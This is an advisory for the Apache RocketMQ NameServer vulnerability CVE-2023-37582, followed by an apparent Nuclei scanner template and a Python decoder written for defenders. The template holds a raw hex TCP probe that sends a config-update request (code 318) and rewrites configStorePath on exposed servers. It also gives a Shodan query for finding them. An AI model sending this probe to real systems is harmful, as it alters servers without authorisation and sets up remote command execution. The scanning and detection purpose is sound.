The RocketMQ NameServer component still has a remote command execution vulnerability because the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When a NameServer address is exposed on the public internet and the NameServer lacks permission verification, an attacker can exploit this vulnerability through the NameServer's update-configuration function to execute commands as the system user that RocketMQ runs as. Users are recommended to upgrade their NameServer to version 5.1.2 or above for RocketMQ 5.x, or 4.9.7 or above for RocketMQ 4.x, to prevent these attacks.
PoC code [publicly available]
id: CVE-2023-37582

info:
  name: Apache RocketMQ - Remote Command Execution
  author: daffainfo
  severity: critical
  description: |
    The RocketMQ NameServer component still has a remote command execution vulnerability because the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When a NameServer address is exposed on the public internet and the NameServer lacks permission verification, an attacker can exploit this vulnerability through the NameServer's update-configuration function to execute commands as the system user that RocketMQ runs as. Users are recommended to upgrade their NameServer to version 5.1.2 or above for RocketMQ 5.x, or 4.9.7 or above for RocketMQ 4.x, to prevent these attacks.
  impact: |
    Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
  remediation: |
    Upgrade RocketMQ to version 5.1.2 or above for the 5.x series, or 4.9.7 or above for the 4.x series.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/07/12/1
    - https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
    - https://github.com/Malayke/CVE-2023-37582_EXPLOIT
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37582
    cwe-id: CWE-94
    epss-score: 0.94201
    epss-percentile: 0.99915
    cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: rocketmq
    shodan-query: rocketmq port:"9876"
  tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev,vuln

tcp:
  - inputs:
      - data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
        type: hex

    host:
      - "{{Hostname}}"
    port: 9876
    read-size: 1024

    matchers:
      - type: dsl
        dsl:
          - "contains_all(raw, 'serializeTypeCurrentRPC', 'version')"
          - "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
        condition: and
# digest: 4b0a00483046022100f3a3c3942e63a567e8a28c3ff2abb4ce10ab5e6e5d3d6cfbc130540d3d7463fa022100e1df21bc56cf574c33bdebed187c66b34dd1fc24b208b7c681b3bdf4055a894d:922c64590222798bb761d5b6d8e72950
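The `data:` field above is one raw RocketMQ remoting frame. The Python decoder below is an added example, not part of the template or of RocketMQ's own code: it parses that frame using the wire layout of RocketMQ's RemotingCommand and flags request code 318 (UPDATE_NAMESRV_CONFIG in RocketMQ's RequestCode), which is exactly the request the matcher probes for and which, arriving from an untrusted network, a defender should alert on regardless of whether the server answers with the 'Can not update config' or 'FORBID ACCESS' refusal the matcher looks for.

```python
import json
import struct

# Request code for "update NameServer config" in RocketMQ's RequestCode class.
UPDATE_NAMESRV_CONFIG = 318

# The exact bytes the template's `data:` field sends, split for readability.
PROBE_HEX = (
    "000000a400000061"
    "7b22636f6465223a3331382c22666c6167223a302c"
    "226c616e6775616765223a224a415641222c226f7061717565223a302c"
    "2273657269616c697a655479706543757272656e74525043223a224a534f4e222c"
    "2276657273696f6e223a3430357d"
    "636f6e66696753746f7265506174683d2f746d702f70776e65640a"
    "70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374"
)

def parse_remoting_frame(frame: bytes) -> dict:
    """Split a RocketMQ remoting frame (RemotingCommand.encode layout) into its
    JSON header and raw body: 4-byte big-endian length of everything that
    follows, a 4-byte word (top byte = serializer, 0 = JSON; low 24 bits =
    header length), the header bytes, then the body."""
    if len(frame) < 8:
        raise ValueError("frame too short for length fields")
    total_len, mark = struct.unpack(">II", frame[:8])
    serializer, header_len = mark >> 24, mark & 0x00FFFFFF
    if total_len != len(frame) - 4:
        raise ValueError(f"length field {total_len} != {len(frame) - 4}")
    if 4 + header_len > total_len or serializer != 0:
        raise ValueError("bad header length or non-JSON serializer")
    header = json.loads(frame[8:8 + header_len])
    return {"header": header, "body": frame[8 + header_len:4 + total_len]}

def classify_frame(frame: bytes) -> dict:
    """Report the request code, the config keys an update would set, and whether
    the frame is a NameServer config update, which should only ever arrive from
    an administrator inside the trusted network."""
    parsed = parse_remoting_frame(frame)
    code = parsed["header"].get("code")
    keys = []
    if code == UPDATE_NAMESRV_CONFIG:
        # Body is a Java Properties-style "key=value" list, one per line.
        for line in parsed["body"].decode("utf-8", "replace").splitlines():
            if "=" in line:
                keys.append(line.split("=", 1)[0].strip())
    return {"code": code, "config_keys": keys, "alert": code == UPDATE_NAMESRV_CONFIG}

if __name__ == "__main__":
    print(classify_frame(bytes.fromhex(PROBE_HEX)))
```

Run against the template's own probe it reports code 318 with the keys `configStorePath` and `productEnvName`, which is the signature to hunt for in captured port 9876 traffic.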